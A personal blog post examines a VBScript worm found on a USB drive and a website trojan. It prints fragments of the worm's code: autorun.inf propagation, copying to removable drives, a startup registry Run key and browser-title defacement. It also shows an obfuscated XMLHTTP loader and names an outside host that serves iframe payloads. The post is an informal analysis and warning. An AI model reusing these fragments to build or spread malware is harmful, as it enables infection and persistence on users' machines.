Last fews day suddenly found a VBS file generated in my pendrive.
with my curiosity, I open it up and shocked with it!
Set fs = createobject("Scripting.FileSystemObject")
Set WNet = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = WNet.ComputerName & ".vbs"
'EHR02.vbs EHR02.vbs EHR02.vbs EHR02.vbs EHR02.vbsEHR02.vbsEHR02.vbsEHR02.vbsEHR02.vbs
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe EHR02.vbs"
This line will auto populate and execute the vbscripts.
and this line, that populate the vbscripts to my pen drive!
Besides, this file is populated to other system path such as windows, windows\system, windows\system32 and so on.
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\EHR02.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\EHR02.vbs",2,true)
tf.write mysource
tf.close
And finally this line will register the code in windows startup registry and pop a message out a message "Mutation of Trojan virus!" when the date is the 9th !!
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
if check <> 1 then
If Int((100-1+1)* Rnd+1)=9 And Int(Day(date))=9 Then
MsgBox "Mutation of Trojan virus!"
End if
Wscript.sleep 60000
Else
And yet another response if the day is not the 9th, your IE browser tittle will be changed to
"Hack by xxxxx"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname,".vbs","")
Well, I am shocked, but excited about it!
And I am looking into VBscript in my machine and found that actualy vbscripts use in lot of field, including IIS setup, Project deployment, Photoshop batch action and so on.
It seem nice to 'play' since I am a vb programmer =)
And few days later, I saw a website been hacked by this method again,
that website changed to be IFRAME lines across the screen.
Further tracing into it, It is from "http://www.goldunix.com/test.htm"
This Trojan is using appending Windows Objects in variable and created the object via CreateObject() function
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Set x = df.CreateObject(strb,"")
It use the "Microsoft.Adodb.Stream" Get method to load the IFRAME from the hacker site.
Then this trojan using createobject("Scripting.FileSystemObject","") and execute the svchost.exe and received via this svchost from net.
Then using Createobject("Shell.Application","") and execute ShellExecute function to create more svchost to retrieve and insert rubbish IFrame code that block the original website.
All this process is from a HTML file which having vbscript inside and unluckly user allow their Active X control in their IE to allow the trojan activated.
I tested that html file and no issue for my FireFox =) ha ha ha...
but IE user have to be careful in allowing unkonwn ActiveX ya !
Trojan is danger, but is fun to a programmer, ha ha ha...... ( just kidding to some non-IT guys )
No comments:
Post a Comment